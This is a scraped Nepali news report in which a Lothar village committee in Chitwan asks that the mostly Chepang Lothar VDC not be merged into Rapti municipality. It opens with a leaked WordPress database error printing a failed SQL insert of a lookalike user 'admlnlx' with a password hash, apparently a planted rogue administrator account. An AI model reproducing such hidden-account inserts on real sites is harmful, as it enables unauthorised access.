WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYCtCY6d28Gp74K4v57qV11W9NRZTj/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 13:09:21', '', 'admlnlx', 'admlnlx')
चितवन,माघ २१-
मधेशी जनअधिकार फोरम लोथर गाउँ कमिटीले लोथर गाविसलाई नगरपालिकामा समायोजन नगर्न माग गरेको छ । गाउँ कमिटीले आज एक विज्ञप्ती जारी गरी लोथर गाविसलाई नगरपालिकामा समायोजन गर्ने निर्णय पुनविचार गर्न माग गरेको छ ।
सरकारले लोथर गाविसलाई राप्ती नगरपालिकामा समायोजन गर्न लागेको भन्दै कमिटीका अध्यक्ष सागर चेपाङले भौगोलिक विकटता र यहाँको जनताको भेगेको दुखलाई मुल्याङकन गरी लोथरलाई गाविस नै हुन दिन आग्रह गरे । लोथर गाविसमा अधिकाँस चेपाङ समुदायको बसोबास रहेको छ । ६ महिना सहकाल र ६ महिना अनिकाल लाग्ने लोथर गाविसलाई नगरपालिकामा समायोजन गर्नु गलत भएको उनले बताए ।